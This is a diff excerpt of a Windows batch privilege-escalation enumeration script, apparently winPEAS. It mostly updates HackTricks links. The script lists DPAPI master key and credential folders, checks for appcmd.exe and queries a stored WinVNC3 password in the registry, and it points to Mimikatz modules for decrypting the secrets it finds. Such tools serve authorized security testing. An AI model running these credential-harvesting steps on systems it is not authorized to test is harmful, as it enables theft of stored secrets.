CALL :ColorLine " %E%33m[+]%E%97m DPAPI MASTER KEYS"
ECHO. [i] Use the Mimikatz 'dpapi::masterkey' module with appropriate arguments (/rpc) to decrypt
ECHO. [?] https://book.hacktricks.xyz/windows/windows-local-privilege-escalation#dpapi
ECHO. [?] https://book.hacktricks.xyz/windows-hardening/windows-local-privilege-escalation#dpapi
powershell -command "Get-ChildItem %appdata%\Microsoft\Protect" 2>nul
powershell -command "Get-ChildItem %localappdata%\Microsoft\Protect" 2>nul
CALL :T_Progress 2
CALL :ColorLine " %E%33m[+]%E%97m DPAPI MASTER KEYS"
ECHO. [i] Use the Mimikatz 'dpapi::cred' module with appropriate /masterkey to decrypt
ECHO. [i] You can also extract many DPAPI masterkeys from memory with the Mimikatz 'sekurlsa::dpapi' module
ECHO. [?] https://book.hacktricks.xyz/windows/windows-local-privilege-escalation#dpapi
ECHO. [?] https://book.hacktricks.xyz/windows-hardening/windows-local-privilege-escalation#dpapi
ECHO.
ECHO.Looking inside %appdata%\Microsoft\Credentials\
ECHO.
@ -565,7 +565,7 @@ CALL :T_Progress 2
:AppCMD
CALL :ColorLine " %E%33m[+]%E%97m AppCmd"
ECHO. [?] https://book.hacktricks.xyz/windows/windows-local-privilege-escalation#appcmd-exe
ECHO. [?] https://book.hacktricks.xyz/windows-hardening/windows-local-privilege-escalation#appcmd-exe
IF EXIST %systemroot%\system32\inetsrv\appcmd.exe ECHO.%systemroot%\system32\inetsrv\appcmd.exe exists.
ECHO.
CALL :T_Progress 2
@ -573,7 +573,7 @@ CALL :T_Progress 2
:RegFilesCredentials
CALL :ColorLine " %E%33m[+]%E%97m Files in registry that may contain credentials"
ECHO. [i] Searching specific files that may contains credentials.
ECHO. [?] https://book.hacktricks.xyz/windows/windows-local-privilege-escalation#credentials-inside-files
ECHO. [?] https://book.hacktricks.xyz/windows-hardening/windows-local-privilege-escalation#credentials-inside-files
ECHO.Looking inside HKCU\Software\ORL\WinVNC3\Password
reg query HKCU\Software\ORL\WinVNC3\Password 2>nul
CALL :T_Progress 2

Binary file not shown.

Binary file not shown.